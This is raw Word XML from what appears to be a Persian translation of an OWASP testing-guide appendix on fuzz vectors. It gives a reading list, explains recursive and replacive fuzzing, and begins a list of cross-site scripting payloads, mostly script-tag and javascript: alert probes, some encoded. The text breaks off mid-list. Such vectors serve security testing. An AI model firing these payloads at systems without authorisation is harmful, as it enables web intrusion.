    <w:p w14:paraId="7DC4863C" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00836142" w:rsidRDefault="00836142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ISBN 0201360462 - http://www.systemsguild.com/GuildSite/Robs/RMPBookPage.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775EB2D1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The Unified Modeling Language – A User Guide -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FEE20F" w14:textId="77777777" w:rsidR="00DB7304" w:rsidRPr="00DB7304" w:rsidRDefault="00DB7304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http://www.awprofessional.com/catalog/product.asp?product_id=%7B9A2EC551-6B8D-4EBC-A67E-84B883C6119F%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32FCBD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Web Applications (Hacking Exposed) by Joel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Scambray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 and Mike Shema, published by McGraw-Hill Osborne Media, ISBN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16CDB4" w14:textId="77777777" w:rsidR="00DB7304" w:rsidRPr="00DB7304" w:rsidRDefault="00DB7304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007222438X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE53B8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Software Testing In The Real World (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Acm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 Press Books) by Edward Kit, published by Addison-Wesley Professional, ISBN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3EB840" w14:textId="77777777" w:rsidR="00DB7304" w:rsidRPr="00DB7304" w:rsidRDefault="00DB7304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0201877562 (1995)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F3336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Securing Java, by Gary McGraw, Edward W. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Felten</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, published by Wiley, ISBN 047131952X (1999) -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC6ECA" w14:textId="77777777" w:rsidR="00DB7304" w:rsidRPr="00DB7304" w:rsidRDefault="00DB7304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http://www.securingjava.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C322DB" w14:textId="77777777" w:rsidR="00836142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proofErr w:type="spellStart"/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Beizer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, Boris, Software Testing Techniques, 2nd Edition, © 1990 International Thomson Computer Press, ISBN 0442206720</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D25D7" w14:textId="77777777" w:rsidR="00DB7304" w:rsidRPr="00DB7304" w:rsidRDefault="00DB7304" w:rsidP="00DB7304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644193BA" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="00DB7304" w:rsidP="00836142">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi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DB7304">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>وب سایت های مفید</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CD329E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OWASP — http://www.owasp.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551BAE64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SANS - http://www.sans.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FE07C0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Secure Coding — http://www.securecoding.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C06ED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Secure Coding Guidelines for the .NET Framework -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16227217" w14:textId="77777777" w:rsidR="00DB7304" w:rsidRPr="00DB7304" w:rsidRDefault="00DB7304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http://msdn.microsoft.com/security/securecode/bestpractices/default.aspx?pull=/library/enus/dnnetsec/html/seccodeguide.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F947A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Security in the Java platform — http://java.sun.com/security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336FE809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O</w:t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ASIS WAS XML — http://www.oasis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open.org/committees/tc_home.php?wg_abbrev=was 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cr/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67256155" w14:textId="77777777" w:rsidR="00DB7304" w:rsidRPr="00DB7304" w:rsidRDefault="00DB7304" w:rsidP="00DB7304">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7304">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi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پیوست </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7304">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7304">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi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: بردار های</w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">FUZZ </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7304">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi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 w:rsidR="00CB51FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:commentRangeStart w:id="2"/>
      <w:r w:rsidRPr="00DB7304">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>نامشخص</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="00216967">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rtl/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r w:rsidR="00CB51FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="2"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013DF56" w14:textId="77777777" w:rsidR="00DB7304" w:rsidRPr="00DB7304" w:rsidRDefault="00DB7304" w:rsidP="00CB51FC">
      <w:pPr>
        <w:bidi/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موارد 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ز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بردارها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CB51FC" w:rsidRPr="0038135A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>FUZZ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هستند که م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توانند با </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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WebScarab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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، </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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JBroFuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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، </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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WSFuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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ا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CB51FC" w:rsidRPr="0038135A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>FUZZER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های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گر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استفاده شوند. </w:t>
      </w:r>
      <w:r w:rsidRPr="0038135A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Fuzzing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رو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کرد</w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC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"</w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC"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س</w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC"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="00CB51FC"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نک</w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC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آشپزخانه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" برا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آزما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ش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پاسخ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برنامه به دستکار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پارامتر است. به طور کل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نفر به دنبال </w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC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خطا 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میگردد،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که در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برنامه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در نت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جه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فاز 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جاد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شده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. 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بخش ساده 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از مرحله کشف است. هنگام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که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خطا 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پیدا می شود،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شناسا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یی</w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC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و 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نفوذ</w:t>
      </w:r>
      <w:r w:rsidR="00CB51FC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آس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ب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پذ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بالقوه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جا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است که مهارت ن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از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می شود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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B9779" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="00836142" w:rsidP="00CB51FC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7B9EBD64" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00CB51FC" w:rsidRDefault="00CB51FC" w:rsidP="00CB51FC">
      <w:pPr>
        <w:bidi/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</w:pPr>
      <w:r w:rsidRPr="00CB51FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>دسته بند</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB51FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi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ی </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB51FC"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  <w:t>FUZZ</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB51FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ها</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D4ADA0" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="00020C31" w:rsidP="00020C31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در مورد پروتکل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های شبکه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stateless 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fuzzing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، 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(مانند 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 (S)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) دو دسته گسترده وجود دارد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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6115962F" w14:textId="77777777" w:rsidR="00020C31" w:rsidRPr="00020C31" w:rsidRDefault="00020C31" w:rsidP="00020C31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Recursive fuzzing</w:t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ab/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ab/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بازگشتی</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F78B8" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00020C31" w:rsidRDefault="00020C31" w:rsidP="00020C31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00020C31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Replacive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00020C31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 fuzzing</w:t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ab/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ab/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جایگزین</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C36F70B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63B056C8" w14:textId="77777777" w:rsidR="00020C31" w:rsidRPr="00020C31" w:rsidRDefault="00020C31" w:rsidP="00020C31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ما هر دسته بند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را در ز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بخش ها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که دنبال م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کنند بررس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و تعر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ف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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE252C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</w:pPr>
    </w:p>
    <w:p w14:paraId="76E5061D" w14:textId="77777777" w:rsidR="00020C31" w:rsidRDefault="00020C31" w:rsidP="00836142">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w14:paraId="4B286D90" w14:textId="77777777" w:rsidR="00020C31" w:rsidRDefault="00020C31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68FFFDDC" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00020C31" w:rsidRDefault="00020C31" w:rsidP="00020C31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00020C31">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RECURSIVE FUZZING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBAC4E0" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00020C31" w:rsidRDefault="00020C31" w:rsidP="004D2C96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020C31">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>RECURSIVE FUZZING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م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تواند به عنوان فرآ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ند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20C31">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>FUZZING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بخش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از درخواست با تکرار از طر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ق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تمام ترک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بات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ممکن از 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الفبا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مجموعه </w:t>
      </w:r>
      <w:r w:rsid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شود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. به موارد ز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توجه کن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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1FAB0D" w14:textId="77777777" w:rsidR="00B76E40" w:rsidRPr="00B76E40" w:rsidRDefault="00B76E40" w:rsidP="00B76E40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08F1FE39" w14:textId="77777777" w:rsidR="00B76E40" w:rsidRPr="00B76E40" w:rsidRDefault="00B76E40" w:rsidP="00B76E40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76E40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http://www.example.com/8302fa3b Selecting "8302fa3b" as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00B76E40">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:bidi="fa-IR"/>
          </w:rPr>
          <w:t>http://www.example.com/00000000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46B284C8" w14:textId="77777777" w:rsidR="00B76E40" w:rsidRPr="00B76E40" w:rsidRDefault="00B76E40" w:rsidP="00B76E40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76E40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... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499CCFB6" w14:textId="77777777" w:rsidR="00B76E40" w:rsidRPr="00B76E40" w:rsidRDefault="00B76E40" w:rsidP="00B76E40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76E40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http://www.example.com/11000fff </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD957E7" w14:textId="77777777" w:rsidR="00B76E40" w:rsidRPr="00B76E40" w:rsidRDefault="00B76E40" w:rsidP="00B76E40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76E40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... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E0A23" w14:textId="77777777" w:rsidR="00B76E40" w:rsidRPr="00B76E40" w:rsidRDefault="00B76E40" w:rsidP="00B76E40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76E40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>http://www.example.com/ffffffff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A7DD05" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="00B76E40" w:rsidRDefault="00B76E40" w:rsidP="00B76E40">
      <w:pPr>
        <w:jc w:val="center"/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bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76E40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bidi="fa-IR"/>
        </w:rPr>
        <w:t>REPLACIVE FUZZING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D6EFD7" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96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bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>REPLACIVE FUZZING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م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تواند به عنوان </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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فرآ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ند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 </w:t>
      </w:r>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>FUZZING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بخش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proofErr w:type="gramEnd"/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از درخواست با استفاده از جا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گز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آن با مقدار مجموعه تعر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ف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شود. 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مقدار به عنوان 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بردار </w:t>
      </w:r>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>fuzz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شناخته م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شود. در شرا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ط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که:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC01F2" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A357B0" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2C96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http://www.example.com/8302fa3b </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67CC4F" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2C96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Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15D693" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2C96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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD5CA8C" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2C96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>http://www.example.com/&gt;"&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D2C96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>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D2C96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>"XSS")&lt;/script&gt;&amp; http://www.example.com/'';!--"&lt;XSS&gt;=&amp;{()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C85485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005F4F4E" w14:textId="77777777" w:rsidR="00836142" w:rsidRDefault="004D2C96" w:rsidP="004D2C96">
      <w:pPr>
        <w:bidi/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</w:pP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شکل از </w:t>
      </w:r>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>REPLACIVE FUZZING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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است. در 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دسته، تعداد کل درخواست ها به تعداد بردارها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fuzz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مشخص شده بستگ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دارد.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637226C5" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96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باق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مانده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پیوست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تعداد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از دسته ها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بردار فاز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را ارائه م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دهد.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D463FB1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7B062F48" w14:textId="77777777" w:rsidR="00836142" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96">
      <w:pPr>
        <w:jc w:val="center"/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</w:pPr>
      <w:r w:rsidRPr="004D2C96"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  <w:lastRenderedPageBreak/>
        <w:t>CROSS SITE SCRIPTING (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3750D006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32493B31" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="004D2C96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E708571" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="00A819B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&gt;"&gt;&lt;script&gt;alert("XSS")&lt;/script&gt;&amp; "&gt;&lt;STYLE&gt;@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>import"javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">('XSS')";&lt;/STYLE&gt; &gt;"'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23 x69;%26%23x70;%26%23x74;%26%23x3a;  alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBC1431" w14:textId="77777777" w:rsidR="004D2C96" w:rsidRPr="004D2C96" w:rsidRDefault="004D2C96" w:rsidP="00A819B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt; '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "&gt; &gt;" '';!--"&lt;XSS&gt;=&amp;{()} &lt;IMG SRC="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>('XSS');"&gt; &lt;IMG SRC=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2C96">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
